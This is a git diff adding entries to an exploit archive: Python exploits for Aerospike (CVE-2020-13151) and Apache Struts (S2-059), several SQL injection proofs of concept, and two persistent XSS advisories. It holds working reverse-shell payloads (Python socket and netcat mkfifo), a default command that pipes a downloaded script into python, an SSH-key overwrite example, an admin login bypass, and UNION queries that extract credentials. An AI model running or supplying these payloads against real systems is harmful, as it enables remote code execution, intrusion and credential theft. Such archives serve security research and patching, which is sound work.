diff --git a/exploits/multiple/remote/49067.py b/exploits/multiple/remote/49067.py new file mode 100755 index 000000000..5ec8e8780 --- /dev/null +++ b/exploits/multiple/remote/49067.py @@ -0,0 +1,175 @@ +# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution +# Date: 2020-08-01 +# Exploit Author: Matt S +# Vendor Homepage: https://www.aerospike.com/ +# Version: < 5.1.0.3 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2020-13151 + +#!/usr/bin/env python3 +import argparse +import random +import os, sys +from time import sleep +import string + +# requires aerospike package from pip +import aerospike +# if this isn't installing, make sure os dependencies are met +# sudo apt-get install python-dev +# sudo apt-get install libssl-dev +# sudo apt-get install python-pip +# sudo apt-get install zlib1g-dev + +PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&""" +NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&' + +def _get_client(cfg): + try: + return aerospike.client({ + 'hosts': [(cfg.ahost, cfg.aport)], + 'policies': {'timeout': 8000}}).connect() + + except Exception as e: + print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}") + +def _send(client, cfg, _cmd): + try: + print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd])) + except Exception as e: + print(f"[-] UDF execution returned {e.msg}") + +def _register_udf(client, cfg): + try: + client.udf_put(cfg.udfpath) + except Exception as e: + print(f"[-] whoops, couldn't register the udf {cfg.udfpath}") + raise e + +def _random_string(l): + return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)]) + +def _populate_table(client, cfg): + ns = cfg.namespace + setname = cfg.setname + print(f"[+] writing to {ns}.{setname}") + try: + rec = cfg.dummystring + client.put((ns, setname, rec), {'pk':cfg.dummystring}) + print(f"[+] wrote {rec}") + except Exception as e: + print(f"[-] unable to write record: {e.msg}") + try: + if e.msg.startswith('Invalid namespace'): + print("Valid namespaces: ") + for n in _info_parse("namespaces", client).split(";"): + print(n.strip()) + except: + pass + sys.exit(13) + +def _info_parse(k, client): + try: + return [i[1] for i in client.info_all(k).values() ][0] + except Exception as e: + print(f"error retrieving information: {e.msg}") + return [] + +def _is_vuln(_mj, _mi, _pt, _bd): + fixed = [5,1,0,0] + found = [_mj, _mi, _pt, _bd] + + if fixed == found: + return False + + for ix, val in enumerate(found): + if val < fixed[ix]: + return True + elif val == fixed[ix]: + pass + else: + return False + + +def _version_check(client): + print("[+] aerospike build info: ", end="") + try: + _ver = _info_parse("build", client) + print(_ver) + mj, mi, pt, bd = [int(i) for i in _ver.split('.')] + if _is_vuln(mj, mi, pt, bd): + print("[+] looks vulnerable") + return + else: + print(f"[-] this instance is patched.") + sys.exit(0) + + except Exception as e: + print(f"[+] unable to interpret build number due to {e}") + print("[+] continuing anyway... ") + +def _exploit(cfg): + client = _get_client(cfg) + + if not client: + return + + _version_check(client) + + print(f"[+] populating dummy table.") + _populate_table(client, cfg) + + print(f"[+] registering udf") + + _register_udf(client, cfg) + + if cfg.pythonshell or cfg.netcatshell: + sys.stdout.flush() + print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="") + sys.stdout.flush() + for i in range(4): + print(".", end="") + sys.stdout.flush() + sleep(1) + + print(".") + _send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) ) + + if cfg.cmd: + print(f"[+] issuing command \"{cfg.cmd}\"") + _send(client, cfg, cfg.cmd) + +if __name__ == '__main__': + if len(sys.argv) == 1: + print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000") + print("... or ... ") + print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'") + sys.exit(0) + + parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC') + + parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1") + parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int) + parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test") + parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None) + parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None) + parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true") + parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true") + parser.add_argument("--lhost", help="host to use for reverse shell callback") + parser.add_argument("--lport", help="port to use for reverse shell callback") + parser.add_argument("--cmd", help="custom command to issue against the underlying host") + parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None) + + cfg = parser.parse_args() + if not cfg.setname: + cfg.setname = 'cve202013151' + if not cfg.dummystring: + cfg.dummystring = _random_string(16) + if not cfg.udfpath: + cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua') + + assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport" + if cfg.pythonshell or cfg.netcatshell: + assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell" + + _exploit(cfg) \ No newline at end of file diff --git a/exploits/multiple/remote/49068.py b/exploits/multiple/remote/49068.py new file mode 100755 index 000000000..1551ebacf --- /dev/null +++ b/exploits/multiple/remote/49068.py @@ -0,0 +1,163 @@ +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + +stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/exploits/php/webapps/49048.txt b/exploits/php/webapps/49048.txt index 22b8874b7..f3a3d8330 100644 --- a/exploits/php/webapps/49048.txt +++ b/exploits/php/webapps/49048.txt @@ -34,4 +34,32 @@ $result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'"); .. .. +------------------------------- + +Vulnerable param: id +------------------------------------------------------------------------- +GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 163 +Origin: http://localhost +Connection: close +Cookie: COOKIE +Upgrade-Insecure-Requests: 1 +------------------------------------------------------------------------- + +Source Code: \WBS\viewbill.php + +.. +.. +.. +$id =$_REQUEST['id']; +$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'"); +.. +.. + ------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49051.txt b/exploits/php/webapps/49051.txt deleted file mode 100644 index b7a8f4fab..000000000 --- a/exploits/php/webapps/49051.txt +++ /dev/null @@ -1,38 +0,0 @@ -# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated) -# Date: 2020-11-14 -# Exploit Author: Mehmet Kelepçe / Gais Cyber Security -# Author ID: 8763 -# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html -# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code -# Version: 1.0 -# Tested on: Apache2 and Windows 10 - -Vulnerable param: id -------------------------------------------------------------------------- -GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1 -Host: localhost -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 -Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -Content-Type: application/x-www-form-urlencoded -Content-Length: 163 -Origin: http://localhost -Connection: close -Cookie: COOKIE -Upgrade-Insecure-Requests: 1 - - -------------------------------------------------------------------------- - -Source Code: \WBS\viewbill.php - -.. -.. -.. -$id =$_REQUEST['id']; -$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'"); -.. -.. - -------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49056.txt b/exploits/php/webapps/49056.txt index e8f3d6e3f..6611f0b70 100644 --- a/exploits/php/webapps/49056.txt +++ b/exploits/php/webapps/49056.txt @@ -29,4 +29,27 @@ booking.php: $qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']); foreach($qry->fetch_array() as $k => $val){ $$k=$val; -} \ No newline at end of file +} + +Vulnerable param: id +------------------------------------------------------------------------- +GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + + +Source Code: + +view_car.php: +-------------------------------------------------------------------- +query("SELECT * FROM cars where id= ".$_GET['id']); \ No newline at end of file diff --git a/exploits/php/webapps/49058.txt b/exploits/php/webapps/49058.txt new file mode 100644 index 000000000..913e708f0 --- /dev/null +++ b/exploits/php/webapps/49058.txt @@ -0,0 +1,43 @@ +# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass +# Date: 17-11-2020 +# Exploit Author: Kislay Kumar +# Vendor Homepage: http://egavilanmedia.com +# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/ +# Version: N/A (Default) +# Tested on: Kali Linux + +SQL Injection: +SQL injection is a web security vulnerability that allows an attacker +to alter the SQL queries made to the database. This can be used to +retrieve some sensitive information, like database structure, tables, +columns, and their underlying data. + +Attack Vector: +An attacker can gain admin panel access using malicious sql injection queri= +es. + +Steps to reproduce: +1. Open admin login page using following URl: +-> http://localhost/admin/login.html + +2. Now put below Payload in both the fields( User ID & Password) +Payload: admin' or '1'='1 + +3. Server accepted our payload and we bypassed admin panel without any +credentials, + +IMPACT: +if any attacker can gain admin panel access than they can Update & +Delete Userdata + +Suggested Mitigation/Remediation Actions +Parameterized queries should be used to separate the command and data +portions of the intended query to the database. These queries prevent +an attacker from tampering with the query logic and extending a +concatenated database query string. Code reviews should be conducted +to identify any additional areas were the application or other +applications in the organization are vulnerable to this attack. +Additionally, input validation should be enforced on the server side +in order to ensure that only expected data is sent in queries. Where +possible security specific libraries should be used in order to +provide an additional layer of protection. \ No newline at end of file diff --git a/exploits/php/webapps/49059.txt b/exploits/php/webapps/49059.txt new file mode 100644 index 000000000..fd53a530a --- /dev/null +++ b/exploits/php/webapps/49059.txt @@ -0,0 +1,33 @@ +# Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection +# Google Dork: N/A +# Date: 11/16/2020 +# Exploit Author: Ramil Mustafayev +# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/ +# Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip +# Version: 1.0 +# Tested on: Win10 x64, Kali Linux x64 +# CVE : N/A +######## Description ######## +# +# An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System. +# +# In getuser.php file, GET parameter 'q' is vulnerable. +# +# The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection. +# +############################# + +Vulnerable code: + +include_once 'assets/conn/dbconnect.php'; +$q = $_GET['q']; // Vulnerable param +// echo $q; +$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point + +Used Payload: + +http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23 + +Output: + +Extracted database: qbqvqdb_healthcareqvbxq \ No newline at end of file diff --git a/exploits/php/webapps/49060.txt b/exploits/php/webapps/49060.txt new file mode 100644 index 000000000..dae5af311 --- /dev/null +++ b/exploits/php/webapps/49060.txt @@ -0,0 +1,366 @@ +# Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting +# Exploit Author: Vulnerability-Lab +# Date: 2020-11-16 +# Vendor Homepage: https://www.sugarcrm.com +# Version: 6.5.18 + +Document Title: +=============== +SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2249 + + +Release Date: +============= +2020-11-16 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2249 + + +Common Vulnerability Scoring System: +==================================== +5.1 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +2.000€ - 3.000€ + + +Product & Service Introduction: +=============================== +SugarCRM empowers your marketing, sales and services teams to +collaborate across the entire customer lifecycle for more +meaningful, memorable experiences. More than 2 million users in 120 +countries have switched to SugarCRM to fuel extraordinary +customer experiences. We have disrupted the market with a relentless +pursuit of innovation and visionary solutions, +bringing the world’s first no-touch, time-aware CX platform. The CX +suite aggregates the millions of different data points +on your customers and turns them into proactive truths, trends and +predictions for you to leverage. + +(Copy of the Homepage: https://www.sugarcrm.com ) + + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a persistent +cross site scripting web vulnerability in the official SugarCRM v6.5.18 +web-application. + + +Affected Product(s): +==================== +SugarCRM +Product: SugarCRM v6.5.18 - CRM (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-05-03: Researcher Notification & Coordination (Security Researcher) +2020-05-04: Vendor Notification (Security Department) +2020-05-24: Vendor Notification (Security Department) +****-**-**: Vendor Response/Feedback (Security Department) +****-**-**: Vendor Fix/Patch (Service Developer Team) +****-**-**: Security Acknowledgements (Security Department) +2020-11-16: Public Disclosure (Vulnerability Laboratory) + + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (Guest Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official SugarCRM v6.5.18 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to +compromise browser to web-application requests from the application-side. + +The persistent cross site web vulnerability is located in the primary +address state and alternate address state +input fields of the sales or support module open to create a contacts. +Remote attackers with low privileged +sugarcrm accounts are able to inject own malicious script code as +contact. Higher privileged application user +accounts will execute the script code on preview of the created contact +to e.g gain moderator or administrator +rights via session hijacking, phishing or further persistent +manipulative web attacks. The code does not only +execute in the same section were the contact is listed or previewed but +also after save in the view log function +context. The attack can thus way be performed via create of a contact or +via import of a vcf file contact. +The request method to inject is POST and the attack is limited to +registered user accounts with default +contact to the contacts module. + +The script code is able to bypass the basic validation process because +of the primary address state and alternate +address state are exchanged in the transmit request. Normally in a +regular transmit the context is parsed securely. +In the actual case an attacker injects script code in the alternate +adress when changing the main adress the wrong +sanitized code occurs in the front-end. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of +affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Sales +[+] Support + +Vulnerable Input(s): +[+] Primary Address State +[+] Alternate Address State + +Vulnerable Parameter(s): +[+] primary address state +[+] alternate address state + +Affected Module(s): +[+] Sales - Contact List +[+] Support - Contact List + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by +remote attackers with low privileged user account and with low user +interaction. +For security demonstration or to reproduce the persistent cross site web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the sugarcrm application +2. Login as low privileged user account +3. Move to sales or support and click to contact, then open create a new +contact +4. Inject payload in the other address and primary adress to the +alternate address state and primary state input fields +5. Save the entry and a refresh occurs with the inserted contact details +Note: The script code execute immediatly after saving in the primary +adress state and alternate adress state section of both modules +6. Successful reproduce of the persistent cross site scripting web +vulnerability! + + +PoC: Payload +> + + + + + + + + +--- PoC Session Logs (POST) --- +https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user +Host: test23.localhost:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) +Gecko/20100101 Firefox/76.0 +Accept: application/json, */*;q=0.1 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit +X-WP-Nonce: 04a953e188 +X-HTTP-Method-Override: PUT +Content-Type: application/json +Origin: https://test23.localhost:8000 +Content-Length: 614 +Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= +Connection: keep-alive +Cookie: +g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2; +wordpress_test_cookie=WP+Cookie+check; +wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix +xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17; +wp-settings-time-1=1589740723 +{"id":6,"content":"n

nnnn
+
n
+
n
nnn +nnnn +n
nnn"} +- +POST: HTTP/1.1 200 OK +Cache-Control: no-cache, must-revalidate, max-age=0 +Allow: GET, POST, PUT, PATCH, DELETE +Content-Type: application/json; charset=UTF-8 +Vary: Origin +Server: Microsoft-IIS/8.5 +X-Robots-Tag: noindex +Link: ; +rel="https://api.w.org/" +Content-Length: 3108 + + +References: +https://test23.localhost:8000/index.php +https://test23.localhost:8000/wp-admin/post.php + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability +in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab [Research Team] - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/php/webapps/49063.txt b/exploits/php/webapps/49063.txt new file mode 100644 index 000000000..3a98bb4ce --- /dev/null +++ b/exploits/php/webapps/49063.txt @@ -0,0 +1,301 @@ +# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting +# Exploit Author: Vulnerability-Lab +# Date: 2020-11-12 +# Vendor Homepage: https://froxlor.org/ +# Software Link: https://froxlor.org/download/ +# Version: 0.10.16 + +Document Title: +=============== +Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2241 + + +Release Date: +============= +2020-11-12 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2241 + + +Common Vulnerability Scoring System: +==================================== +5.2 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Froxlor Server Management Panel, the lightweight server management +software for your needs. Developed by experienced server +administrators, this open source (GPL) panel simplifies the effort of +managing your hosting. Manage reseller ressources and +limit what the customers may use in the dedicated customerpanel. MySQL +management, Directory protection & settings management. + +(Copy of the Homepage: https://froxlor.org/index.php & +https://froxlor.org/download/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a persistent +cross site vulnerability in the Froxlor Server Management Panel v0.10.16. + + +Affected Product(s): +==================== +Froxlor Team +Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel) +Affected Packages: Gentoo, Debian & Ubuntu + + +Vulnerability Disclosure Timeline: +================================== +2020-05-01: Researcher Notification & Coordination (Security Researcher) +2020-05-02: Vendor Notification (Security Department) +2020-05-13: Vendor Response/Feedback (Security Department) +2020-10-12: Vendor Fix/Patch (Service Developer Team) +****-**-**: Security Acknowledgements (Security Department) +2020-11-12: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (Guest Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Full Disclosure + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the Froxlor Server Management Panel v0.10.16 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The persistent cross site web vulnerability is located in the +`username`, `name` and `firstname` input fields of the customer +add or registration module. Remote attackers are able to add customers +with malicious script code as firstname or name to +manipulate in the backend the `admin_customers.php` and `customers.php` +files. The injection point is the registration +or customer add/edit module and the execution occurs on preview of the +traffic module in the admin backend. The request +method to inject is POST and the attack vector is persistent located on +the application-side. In a valid attack case the +remote attacker uses a customer or reseller account to inject the +payload as name to provoke an execute in the insecure +backend module. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external +redirects to malicious source and persistent manipulation of affected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Input(s): +[+] Username +[+] Name +[+] Firstname + +Vulnerable Module(s): +[+] Customers + +Vulnerable Parameter(s): +[+] name +[+] firstname + +Affected File(s): +[+] admin_customers.php + + +Proof of Concept (PoC): +======================= +The persistent input validation vulnerability can be exploited by remote +attackers with low privilege user account and with low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Register or login with a low privilege user account +2. Open the profile account section +3. Change the name and firstname or include in the registration process +Note: Inject test payload to vulnerable marked input fields +4. Save or submit the input via form +5. Wait until an admin or higher privileged user role opens the traffic +stats to execute +6. Successful reproduce of the persistent input validation web +vulnerability! + + +PoC: Payload (Exploitation) +test%20>"div style=1 + + +PoC: Vulnerable Sources (Execution Points) [admin_customers.php or +customers.php to admin_traffic.php via Name & Firstname] + +>">test%20>"div +style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]  +[Details] +- + + + +--- PoC Session Logs [POST] --- (Reseller Account to Admin) +https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20 +Host: froxlor.localhost:8080 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 879 +Origin: https://froxlor.localhost:8080 +Connection: keep-alive +Referer: +https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add +Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo +s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send& +new_loginname=test1%20>"div +style=1&createstdsubdomain=0,1& +store_defaultindex=0,1&new_customer_password=KwhyqgzvPo& +new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1& +name=btest%20>"div style=1& +firstname=ctest%20>"div +style=1&gender=0& +company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=& 